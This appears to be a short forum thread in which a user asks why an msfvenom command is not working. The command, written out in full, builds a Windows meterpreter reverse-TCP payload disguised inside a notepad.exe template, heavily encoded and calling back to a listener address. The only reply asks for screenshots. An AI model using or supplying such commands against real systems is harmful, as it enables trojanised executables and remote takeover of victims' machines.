Forum Thread: MSFVenom Issues

I have copied notepad.exe form my Windows machine to Kali to use as a template and did this command msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.144 LPORT=4444 -x notepad.exe -e x86/shikataganai -i 2000 -f exe > evil.exe When I transfer the evil.exe to my computer and run it I don't get a response from the file. I do have a handler running with said payload.

Anyhelp would be great, think I built this command wrong.

3 Responses

Could you possibly provide screenshots of the output from msfvenom?

-Defalt

Share Your Thoughts

  • Hot
  • Active